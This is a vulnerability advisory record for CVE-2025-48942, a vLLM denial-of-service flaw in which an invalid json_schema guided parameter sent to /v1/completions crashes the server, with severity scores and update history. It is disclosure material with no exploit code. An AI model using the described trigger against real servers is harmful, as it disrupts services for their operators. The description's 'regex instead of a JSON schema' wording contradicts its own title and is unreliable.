vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
History

Tue, 24 Jun 2025 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Vllm
Vllm vllm
CPEs cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*
Vendors & Products Vllm
Vllm vllm

Sat, 31 May 2025 03:15:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

threat_severity

Moderate


Fri, 30 May 2025 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 30 May 2025 18:45:00 +0000

Type Values Removed Values Added
Description vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
Title vLLM DOS: Remotely kill vllm over http with invalid JSON schema
Weaknesses CWE-248
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2025-05-30T20:37:06.015Z

Reserved: 2025-05-28T18:49:07.581Z

Link: CVE-2025-48942

cve-icon Vulnrichment

Updated: 2025-05-30T20:37:00.956Z

cve-icon NVD

Status : Analyzed

Published: 2025-05-30T19:15:30.130

Modified: 2025-06-24T17:44:47.737

Link: CVE-2025-48942

cve-icon Redhat

Severity : Moderate

Publid Date: 2025-05-30T18:33:40Z

Links: CVE-2025-48942 - Bugzilla